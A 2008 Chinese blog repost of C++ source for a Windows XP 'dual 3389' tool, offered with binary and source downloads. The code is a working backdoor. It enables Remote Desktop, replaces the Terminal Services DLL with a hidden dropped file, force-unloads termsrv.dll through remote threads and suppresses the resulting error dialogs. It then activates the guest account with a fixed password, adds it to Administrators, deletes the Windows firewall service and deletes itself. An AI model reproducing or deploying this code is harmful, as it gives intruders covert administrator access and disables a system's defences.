
xp下双开3389源码

2008年5月26日 发表评论 阅读评论

作者:cooldiyer
来源:红狼

很早时候写的,方便大家用,代码丢了我也可以百度到
编译后,直接运行,XP的终端自动开启激活guest,密码为cooldiyer,加管理员组
并且可以多用户登录
声明,原创………………..
代码:

// xp3389.cpp : tool that enables a second, concurrent RDP (port 3389) session on
//              Windows XP.  Code By CoolDiyer
//
// Review notes (what this program touches on the host, for detection/response):
//  - Registry (HKLM): Services\TermService\Start=2, Winlogon\KeepRASConnections="1",
//    Control\Terminal Server\fDenyTSConnections=0,
//    Control\Terminal Server\Licensing Core\EnableConcurrentSessions=1,
//    Services\TermService\Parameters\ServiceDll="%SystemRoot%\system32\termsrvhack.dll".
//  - Files dropped from an embedded resource (IDR_DLL, type "BIN", not part of
//    this listing): system32\termsrvhack.dll and system32\dllcache\termsrvhack.dll,
//    both marked hidden + read-only + system.
//  - Forces system32\termsrv.dll out of every process that has it loaded by
//    creating a remote thread on kernel32!FreeLibrary, then loops closing the
//    resulting error dialogs and aborting the pending system shutdown.
//  - Starts the TermService service, then runs a hidden cmd.exe that activates
//    the guest account, sets its password, adds it to Administrators, stops and
//    deletes the SharedAccess service (Windows Firewall / ICS) and deletes the
//    running executable.
//  - The linker pragma below merges .rdata and .data into .text and marks that
//    section ERW (execute + read + write).
// stdafx.h, resource.h and the two system headers whose names were lost in the
// HTML extraction are not reproduced here.
#pragma comment(linker, "/FILEALIGN:0x200 /opt:nowin98 /IGNORE:4078 /MERGE:.rdata=.text /MERGE:.data=.text /section:.text,ERW")
#include "stdafx.h"
#include "resource.h"
#include   // header name lost in extraction (Toolhelp32/Win32 APIs are used below)
#include   // header name lost in extraction

// Returns the process id of the first running process whose image name equals
// szProcName (case-insensitive lstrcmpi), or NULL (0) when no process matches or
// the Toolhelp snapshot cannot be created.
// NOTE(review): newer SDKs declare a Win32 function with this same name;
// presumably this was built against an older SDK — confirm.
DWORD
GetProcessId(LPCTSTR szProcName)
{
    PROCESSENTRY32 pe;
    DWORD dwPid;      // only read when bFound is TRUE
    DWORD dwRet;
    BOOL bFound = FALSE;

    HANDLE hSP = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
    if (hSP)
    {
        pe.dwSize = sizeof( pe );

        for (dwRet = Process32First(hSP, &pe);
             dwRet;
             dwRet = Process32Next(hSP, &pe))
        {
            if (lstrcmpi( szProcName, pe.szExeFile) == 0)
            {
                dwPid = pe.th32ProcessID;
                bFound = TRUE;
                break;
            }
        }
        CloseHandle(hSP);

        if (bFound == TRUE)
        {
            return dwPid;
        }
    }
    return NULL;
}

// EnumWindows callback.  lParam carries a process id; every *visible* top-level
// window owned by that process is sent WM_CLOSE.  Always returns true so the
// enumeration continues over all windows.
// Declared as `bool` rather than BOOL; callers cast it to WNDENUMPROC.
bool CALLBACK EnumWindowsProc(HWND hwnd, LPARAM lParam)
{
    if (!IsWindowVisible(hwnd))
        return true;

    // GetWindowThreadProcessId stores the owning *process* id in its out
    // parameter, so despite the name this variable holds a PID.
    DWORD dwWindowThreadId = NULL;
    DWORD  dwLsassId = (DWORD)lParam;   // unused below
    GetWindowThreadProcessId(hwnd, &dwWindowThreadId);
    if (dwWindowThreadId == (DWORD)lParam)
    {
        // close this window of the target process
        SendMessage(hwnd, WM_CLOSE, 0, 0);
    }
    return true;
}

// Write data to the given registry key
// (Mode: 0 create the key and set the value, 1 set the value, 2 delete the named
// subkey, 3 delete the named value)  from NameLess114
//
// Parameters:
//   MainKey  root key (e.g. HKEY_LOCAL_MACHINE)
//   SubKey   path below MainKey
//   Vname    value name (modes 0/1/3) or subkey name to delete (mode 2)
//   Type     REG_SZ / REG_EXPAND_SZ use szData; REG_DWORD uses dwData;
//            REG_BINARY is accepted but writes nothing
//   Mode     see above
// Returns 1 on success, 0 otherwise.
//
// Behaviour to be aware of: case 0 has no `break`, so after RegCreateKeyEx it
// falls through into case 1, which re-opens the key (overwriting hKey) and sets
// the value.  SetReg() below relies on this fall-through.  The __finally block
// closes both hKey and MainKey; hKey is not initialised on the __leave paths.
int WriteRegEx(HKEY MainKey, LPCTSTR SubKey, LPCTSTR Vname, DWORD Type, char* szData, DWORD dwData, int Mode)
{
    HKEY  hKey;
    DWORD dwDisposition;
    int   iResult =0;

    __try
    {
        // SetKeySecurityEx(MainKey,Subkey,KEY_ALL_ACCESS);
        switch(Mode)
        {
        case 0:
            if(RegCreateKeyEx(MainKey,SubKey,0,NULL,REG_OPTION_NON_VOLATILE,KEY_ALL_ACCESS,NULL,&hKey,&dwDisposition) != ERROR_SUCCESS)
                __leave;
            // falls through into case 1
        case 1:
            if(RegOpenKeyEx(MainKey,SubKey,0,KEY_READ|KEY_WRITE,&hKey) != ERROR_SUCCESS)
                __leave;
            switch(Type)
            {
            case REG_SZ:
            case REG_EXPAND_SZ:
                // writes the string including its terminating NUL
                if(RegSetValueEx(hKey,Vname,0,Type,(LPBYTE)szData,strlen(szData)+1) == ERROR_SUCCESS)
                    iResult =1;
                break;
            case REG_DWORD:
                if(RegSetValueEx(hKey,Vname,0,Type,(LPBYTE)&dwData,sizeof(DWORD)) == ERROR_SUCCESS)
                    iResult =1;
                break;
            case REG_BINARY:
                break;
            }
            break;
        case 2:
            if(RegOpenKeyEx(MainKey,SubKey,NULL,KEY_READ|KEY_WRITE,&hKey) != ERROR_SUCCESS)
                __leave;
            if (RegDeleteKey(hKey,Vname) == ERROR_SUCCESS)
                iResult =1;
            break;
        case 3:
            if(RegOpenKeyEx(MainKey,SubKey,NULL,KEY_READ|KEY_WRITE,&hKey) != ERROR_SUCCESS)
                __leave;
            if (RegDeleteValue(hKey,Vname) == ERROR_SUCCESS)
                iResult =1;
            break;
        }
    }
    __finally
    {
        RegCloseKey(MainKey);
        RegCloseKey(hKey);
    }
    return iResult;
}

// Enables (bEnable != 0) or disables the named privilege (e.g. SE_DEBUG_NAME,
// SE_SHUTDOWN_NAME) on the current process token.
// Returns FALSE when the token cannot be opened or when GetLastError() is not
// ERROR_SUCCESS after AdjustTokenPrivileges (e.g. the privilege is not held);
// the return value of LookupPrivilegeValue itself is not checked.
bool DebugPrivilege(const char *PName, BOOL bEnable)
{
    BOOL              bResult = TRUE;
    HANDLE            hToken;
    TOKEN_PRIVILEGES  TokenPrivileges;

    if (!OpenProcessToken(GetCurrentProcess(), TOKEN_QUERY | TOKEN_ADJUST_PRIVILEGES, &hToken))
    {
        bResult = FALSE;
        return bResult;
    }
    TokenPrivileges.PrivilegeCount = 1;
    TokenPrivileges.Privileges[0].Attributes = bEnable ? SE_PRIVILEGE_ENABLED : 0;

    LookupPrivilegeValue(NULL, PName, &TokenPrivileges.Privileges[0].Luid);
    AdjustTokenPrivileges(hToken, FALSE, &TokenPrivileges, sizeof(TOKEN_PRIVILEGES), NULL, NULL);
    if (GetLastError() != ERROR_SUCCESS)
    {
        bResult = FALSE;
    }

    CloseHandle(hToken);
    return bResult;
}

// Forces a module out of another process: opens dwProcessID with
// PROCESS_VM_WRITE | PROCESS_CREATE_THREAD | PROCESS_VM_OPERATION and starts a
// remote thread at kernel32!FreeLibrary with hModuleHandle as its argument,
// then waits for that thread indefinitely.  Returns false if hModuleHandle is
// NULL, the process cannot be opened, or the remote thread cannot be created.
// From a monitoring standpoint this is a cross-process CreateRemoteThread on a
// kernel32 export — the kind of call endpoint telemetry typically surfaces.
bool UnloadRemoteModule(DWORD dwProcessID, HANDLE hModuleHandle)
{
    HANDLE hRemoteThread;
    HANDLE hProcess;

    if (hModuleHandle == NULL)
        return false;
    hProcess=::OpenProcess(PROCESS_VM_WRITE|PROCESS_CREATE_THREAD|PROCESS_VM_OPERATION, FALSE, dwProcessID);
    if (hProcess == NULL)
        return false;

    HMODULE hModule=::GetModuleHandle("kernel32.dll");
    LPTHREAD_START_ROUTINE pfnStartRoutine = (LPTHREAD_START_ROUTINE)::GetProcAddress(hModule, "FreeLibrary");
    hRemoteThread=::CreateRemoteThread(hProcess, NULL, 0, pfnStartRoutine, hModuleHandle, 0, NULL);

    if(hRemoteThread==NULL)
    {
        ::CloseHandle(hProcess);
        return false;
    }
    ::WaitForSingleObject(hRemoteThread,INFINITE);
    ::CloseHandle(hProcess);
    ::CloseHandle(hRemoteThread);
    return true;
}

// Walks the module list of process dwProcessID and returns the HMODULE whose
// full path equals lpModulePath (case-insensitive), or NULL when not found.
// The snapshot handle is passed to Module32First without being validated.
HANDLE FindModule(DWORD dwProcessID, LPCTSTR lpModulePath)
{
    HANDLE hModuleHandle = NULL;
    MODULEENTRY32 me32={0};
    HANDLE hModuleSnap=::CreateToolhelp32Snapshot(TH32CS_SNAPMODULE, dwProcessID);
    me32.dwSize=sizeof(MODULEENTRY32);
    if(::Module32First(hModuleSnap, &me32))
    {
        do
        {
            if (!lstrcmpi(me32.szExePath, lpModulePath))
            {
                hModuleHandle = me32.hModule;
                break;
            }
        }while(::Module32Next(hModuleSnap,&me32));
    }
    ::CloseHandle(hModuleSnap);
    return hModuleHandle;
}

// Iterates every process on the system and, wherever lpModulePath is loaded,
// forces it out via UnloadRemoteModule.  The return value reflects only the
// most recent unload attempt, not whether every unload succeeded.
bool UnloadModule(LPCTSTR lpModulePath)
{
    BOOL bRet = false;
    PROCESSENTRY32 pe32;
    pe32.dwSize = sizeof(pe32);

    HANDLE hProcessSnap=::CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,0);

    // look for processes that have the module loaded
    if(::Process32First(hProcessSnap, &pe32))
    {
        do
        {
            HANDLE hModuleHandle = FindModule(pe32.th32ProcessID, lpModulePath);
            if (hModuleHandle != NULL)
            {
                bRet = UnloadRemoteModule(pe32.th32ProcessID, hModuleHandle);
            }
        }while (Process32Next(hProcessSnap,&pe32));
    }
    CloseHandle(hProcessSnap);
    return bRet;
}

// Starts the named service.  Opens the SCM with SC_MANAGER_CREATE_SERVICE and
// the service with DELETE | SERVICE_START, then calls the Win32 StartService
// (the three-argument overload — this one-argument wrapper shares its name).
// Failures are silently ignored.
void StartService(LPCTSTR lpService)
{
    SC_HANDLE hSCManager = OpenSCManager( NULL, NULL,SC_MANAGER_CREATE_SERVICE );
    if ( NULL != hSCManager )
    {
        SC_HANDLE hService = OpenService(hSCManager, lpService, DELETE | SERVICE_START);
        if ( NULL != hService )
        {
            StartService(hService, 0, NULL);
            CloseServiceHandle( hService );
        }
        CloseServiceHandle( hSCManager );
    }
}

// Writes the embedded resource (wResourceID, of type lpType) from this
// executable to lpFileName, creating/overwriting the file (CREATE_ALWAYS).
// The HGLOBAL from LoadResource is handed straight to WriteFile without
// LockResource; the code relies on that handle being usable as the data
// pointer.  Returns FALSE when the resource is not found/loaded or the file
// handle compares equal to NULL; the WriteFile result is not checked.
BOOL ReleaseResource(WORD wResourceID, LPCTSTR lpType, LPCTSTR lpFileName)
{
    HGLOBAL hRes;
    HRSRC hResInfo;
    HANDLE hFile;
    DWORD dwBytes;

    hResInfo = FindResource(NULL, MAKEINTRESOURCE(wResourceID), lpType);
    if (hResInfo == NULL)
        return FALSE;
    hRes = LoadResource(NULL, hResInfo);
    if (hRes == NULL)
        return FALSE;
    hFile = CreateFile
        (
        lpFileName,
        GENERIC_WRITE,
        FILE_SHARE_WRITE,
        NULL,
        CREATE_ALWAYS,
        FILE_ATTRIBUTE_NORMAL,
        NULL
        );
    if (hFile == NULL)
        return FALSE;
    WriteFile(hFile, hRes, SizeofResource(NULL, hResInfo), &dwBytes, NULL);
    CloseHandle(hFile);

    return TRUE;
}

// Registry changes (all under HKEY_LOCAL_MACHINE, all via WriteRegEx mode 0 —
// create key then set value).  These five values are the persistent indicators
// this tool leaves:
//   TermService\Start = 2                        (service start type: automatic)
//   Winlogon\KeepRASConnections = "1"
//   Terminal Server\fDenyTSConnections = 0       (allow incoming RDP)
//   Licensing Core\EnableConcurrentSessions = 1
//   TermService\Parameters\ServiceDll = %SystemRoot%\system32\termsrvhack.dll
//                                                (service DLL swapped for the dropped file)
void SetReg()
{
    WriteRegEx(HKEY_LOCAL_MACHINE, "SYSTEM\\CurrentControlSet\\Services\\TermService","Start",REG_DWORD,NULL,2,0);
    WriteRegEx(HKEY_LOCAL_MACHINE, "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon", "KeepRASConnections", REG_SZ, "1", 0, 0);
    WriteRegEx(HKEY_LOCAL_MACHINE, "SYSTEM\\CurrentControlSet\\Control\\Terminal Server", "fDenyTSConnections", REG_DWORD, NULL, 0, 0);
    WriteRegEx(HKEY_LOCAL_MACHINE, "SYSTEM\\CurrentControlSet\\Control\\Terminal Server\\Licensing Core", "EnableConcurrentSessions",
        REG_DWORD, NULL, 1, 0);
    WriteRegEx(HKEY_LOCAL_MACHINE, "SYSTEM\\CurrentControlSet\\Services\\TermService\\Parameters", "ServiceDll", REG_EXPAND_SZ,
        "%SystemRoot%\\system32\\termsrvhack.dll", 0, 0);
}

// Drops the embedded DLL (resource IDR_DLL, type "BIN") to
// <system dir>\termsrvhack.dll and <system dir>\dllcache\termsrvhack.dll and
// marks both files hidden + read-only + system.  The ReleaseResource return
// values are ignored.
void ReleaseDll()
{
    char strSystemPath[MAX_PATH];
    char strDllcachePath[MAX_PATH];
    GetSystemDirectory(strSystemPath, sizeof(strSystemPath));
    GetSystemDirectory(strDllcachePath, sizeof(strDllcachePath));
    lstrcat(strSystemPath, "\\termsrvhack.dll");
    lstrcat(strDllcachePath, "\\dllcache\\termsrvhack.dll");
    ReleaseResource(IDR_DLL, "BIN", strSystemPath);
    ReleaseResource(IDR_DLL, "BIN", strDllcachePath);
    SetFileAttributes(strSystemPath, FILE_ATTRIBUTE_HIDDEN | FILE_ATTRIBUTE_READONLY | FILE_ATTRIBUTE_SYSTEM);
    SetFileAttributes(strDllcachePath, FILE_ATTRIBUTE_HIDDEN | FILE_ATTRIBUTE_READONLY | FILE_ATTRIBUTE_SYSTEM);
}

// True when GetVersionEx reports major version 5, minor version 1 (Windows XP).
bool IsOSXP()
{
    OSVERSIONINFOEX OsVerInfoEx;
    OsVerInfoEx.dwOSVersionInfoSize = sizeof(OSVERSIONINFOEX);
    GetVersionEx((OSVERSIONINFO *)&OsVerInfoEx); // note the cast
    return OsVerInfoEx.dwMajorVersion == 5 && OsVerInfoEx.dwMinorVersion == 1;
}

// XP-only path: drops termsrvhack.dll, forces <system dir>\termsrv.dll out of
// every process that has it loaded (needs SE_DEBUG_NAME), then — with
// SE_SHUTDOWN_NAME enabled — loops until AbortSystemShutdown succeeds, closing
// the visible windows of csrss.exe and drwtsn32.exe on each pass so the error
// and shutdown dialogs raised by the forced unload never stay up.
// If UnloadModule fails the function returns early with SE_DEBUG still enabled.
void HijackService()
{
    char strDll[MAX_PATH];
    GetSystemDirectory(strDll, sizeof(strDll));
    lstrcat(strDll, "\\termsrv.dll");
    // drop termsrvhack.dll
    ReleaseDll();

    // walk all processes and unload the currently loaded DLL
    DebugPrivilege(SE_DEBUG_NAME, TRUE);
    if (!UnloadModule(strDll))
        return;
    DebugPrivilege(SE_DEBUG_NAME, FALSE);

    // close the error dialogs that pop up, and the automatic-shutdown dialog
    // caused by services terminating abnormally after the forced DLL unload
    // grant this process the shutdown privilege
    DebugPrivilege(SE_SHUTDOWN_NAME,TRUE);
    // despite the name, this holds the PID of csrss.exe
    DWORD dwLsassId = GetProcessId("csrss.exe");
    // AbortSystemShutdown returns nonzero once a pending shutdown was cancelled
    while (!AbortSystemShutdown(NULL))
    {
        // some systems pop up drwtsn32.exe
        DWORD dwDrwtsn32Id = GetProcessId("drwtsn32.exe");
        if (dwDrwtsn32Id != NULL)
        {
            EnumWindows((WNDENUMPROC)EnumWindowsProc, (LPARAM)dwDrwtsn32Id);
        }
        // the forced unload raises errors; close the error windows shown by csrss.exe
        EnumWindows((WNDENUMPROC)EnumWindowsProc, (LPARAM)dwLsassId);
        Sleep(10);
    }
    DebugPrivilege(SE_SHUTDOWN_NAME, FALSE);
}

// Entry point.  Order of operations: registry changes (SetReg), the XP-only DLL
// swap (HijackService), start TermService, then a hidden cmd.exe that activates
// the guest account, sets its password, adds it to the Administrators group,
// stops the SharedAccess service (Windows Firewall / ICS), deletes this
// executable and deletes the SharedAccess service.  strCommand is built with
// wsprintf into a fixed 1024-byte buffer from the module path.
int WINAPI WinMain(
       HINSTANCE hInstance,      // handle to current instance
       HINSTANCE hPrevInstance,  // handle to previous instance
       LPSTR lpCmdLine,          // command line
       int nCmdShow              // show state
       )
{
    // registry changes
    SetReg();
    if (IsOSXP())
    {
        // swap the DLL
        HijackService();
    }
    // start the terminal service
    StartService("TermService");
    // activate guest, add it to Administrators, self-delete, stop XP's built-in firewall and delete it
    char strCommand[1024];
    char strSelf[MAX_PATH];
    GetModuleFileName(NULL, strSelf, sizeof(strSelf));
    wsprintf(strCommand, "cmd.exe /c net user guest /active:yes && net user guest cooldiyer && net localgroup administrators guest /add && net stop SharedAccess /y && del \"%s\" && sc delete SharedAccess", strSelf);
    WinExec(strCommand, SW_HIDE);
    return 0;
}

下载:bin.rar   src.rar

转载请注明:woyigui's blog [http://www.woyigui.cn/]
本文标题:xp下双开3389源码
本文地址:http://www.woyigui.cn/2008/05/26/Under-a-3389-double-xp-source/
